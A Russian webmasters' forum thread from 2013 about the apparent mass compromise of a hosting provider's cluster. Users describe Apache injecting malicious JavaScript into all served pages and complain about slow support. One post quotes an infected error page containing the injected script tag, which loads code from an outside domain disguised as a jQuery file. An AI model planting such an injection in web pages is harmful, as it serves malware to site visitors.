Вы хотите сказать, что я выполнив команду например "yum install httpd" могу установить уже ломанный Apache?
Если бы ломали сервера Windows update, сайт Касперского, securitylab и т.п., я бы тоже сказал "С КЕМ НЕ БЫВАЕТ". Такие инциденты были у Мастерхоста, Агавы и остальных лидеров русского хостинга? Пока нет.
Эмоционально, безэмоционально, а то, что в компании не было четких инструкций на счет реагирования на инциденты с ИБ, а в трудовом договоре с админами из отдела эксплуатации нет строчки, что они всегда должны быть на связи, и что в случае серьезного ЧП они обязаны прибыть на работу срочно (это оплачивается дополнительно), даже ночью (такое есть у военных, пожарных, сотрудников атомных АЭС, технического персонала крупных предприятий) нельзя говорить, что все хорошо.
Да не удалять нужно было, а сохранить заразу для анализа, как сохраняют энцефалитных клещей :)
Конечно, взломать можно все, но многое зависит от политики. Я ни разу не видел, что ломали сайт microsoft.com, касперского, остальных антивирусов. Не ломают популярные сайты на публичных CMS.
Надеюсь, после такого инцидента отношение к ИБ поменяется у всех отечественных хостеров...
Срочно дампы своих сайтов делайте, а не разбирайтесь, что там происходит.
В ночь на Понедельник сбегу от них подальше.
Я вот вспомнил, что тревожный "звоночек" прозвенел еще 2 месяца назад! Пишут мне посетители, что мол антивирус на сайт ругается. Я зашел, ничего нет, отписался, что это ложное срабатывание, откатите базы или обновите.
Только сейчас дошло, что ломанули 2 месяца назад, тогда дрянь они стерли, а дыру не закрыли.
Это не простительно. Там явно произошло что-то серьезное. Но скорее всего, об этом умолчат.---------- Добавлено 28.07.2013 в 10:33 ----------Но - в защиту российских хостеров могу привести один аргумент. Очень часто бывает нужна поддержка на русском языке. Я имел опыт аренды VPS зарубежом, это что-то с чем-то. В поддержке сидят индусы, не понимающие ломанный английский. У меня завис VPS, я пишу им, перезагрузите, т.к. биллинг тоже лежит, как и сайт хостинга, а они "i ran chdsk, server now is up". Причем тут скандиск на VPS?
А все по тому, что это долбанные реселлеры, перепродающие VPSки на арендуемых серверах со всех частей света. И в случае аварии они ничего не могут оперативно исправить. Поэтому я решил, что нужно выбирать хостинг со своим датацентром, где они могут оперативно исправить проблему. Но ошибся. Бывает очень сильная халатность.
Речь идет про недавно вскрывшуюся дыру в ISPMANAGER?
Как такое может быть, что официальный хостинг при разработчике этой системы забил на самообновление... 😕
😮😮😮
Это же просто ППЦ. Как же жить теперь? Обфусцировать все PHP-коды, и базы данных шифровать перед заливкой на продакшн?
Главное, можно взломать дедик, можно залить шелл на шаред, но как можно ломануть сразу ВЕСЬ кластер?
Это моя оценка, вирус появился сегодня в 16 часов, и следовательно все сайты на IP который я уже называл стали одновременно раздавать вирус. ---------- Добавлено 27.07.2013 в 23:17 ---------- Я вот даже не знаю, что делать в будущем, в плане сотрудничества с ISPserver...
Иногда серьезные инциденты с ИБ или массовой аварией укрепляют хостеров.
Если авария в ДЦ - в будущем принимают меры к недопущению. Я в инете с 2006 год, помню как в Мастерхосте летом ломалась система охлаждения и ложился весь ДЦ, а жара в городе была что плавился асфальт...
Я ушел от них, а они сейчас очень стабильны.
Тоже самое про массовые взломы, ладно бы ломанули хостера из 8 "Б", но компанию такого уровня... Для кого-то это все меняет, и такое больше не допускается, а кому то бывает до лампочки. Уходить или нет? ---------- Добавлено 27.07.2013 в 23:19 ---------- Больше всего я боюсь как бы дампы баз данных не украли. Это же ЧП вселенского масштаба! Там есть телефоны, адреса, персональные данные посетителей сайтов, клиентов магазинов... Если данные попадают в третьи руки - базу заспамят, а претензии недовольные будут писать владельцем сайтов, держащих их на ISPserver.
Вирус появляется на всех моих сайтах (30), а также на других сайтах этого хостинга, по reverse IP. Т.е. Вы можете найти все сайты на IP 149.154.68.153 и все они заражены. Кластер msk1.
Пока не пускает только браузер, но дело не в этом, ломанули апач, он внедряет вредоносный код автоматом после тега <head>.
Вот пример для страницы ошибки апача:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title><script language="JavaScript" src="http://igri2011.ru/wp-content/themes/game/js/jquery-1.6.5.min.js" type="text/javascript"></script></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator, webmaster@it.maximkhromov.ru and inform them of the time the error occurred,and anything you might have done that may havecaused the error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.2.16 (Debian) Server at 149.154.68.153 Port 80</address></body></html>
Да для хостера это большие репутационные потери, но не знаю, успею ли по FTP перекачать более 200 ГБ контента с сайтов (бекапы не можем делать чаще раза в неделю)...
То что мигом заразились более 800 сайтов это просто ЧП, жаль что поддержка ничего вообще не соображает, может позвонить в "02" и сказать, что по адресу датацентра совершается преступление (распространение вредоносного ПО для ЭВМ), чтобы хоть руководство по среди ночи подняли и они начали разбираться?
Модер потер, до лампочки ему, что бывают случаи, когда к теме нужно привлечь внимание, т.к. проблемы информационной безопасности касаются многих вебмастеров.
Рассказываю ситуацию по состоянию на 21-55.
Вирус отдают все сервера облачного хостинга ISPserver. Если удалить все файлы - вирус отдает дефолтовая страница 404. Если сделать "deny from all" - вирус отдает 403.
Техподдержка отказывают физически отключить сервер, чтобы он не причинил вреда до прихода специалистов и предлагает ждать понедельника.
Что делать я не знаю, т.к. за выходные он может заразить кучу народа или с взломанного сервака могут слить все сайты клиентов. Круглосуточная поддержка ничего не понимает, а сисадмины уже спят, а их нужно поднять как по тревоге.
Уже раздумываю звонить "02" и вызывать на адрес датацентра...
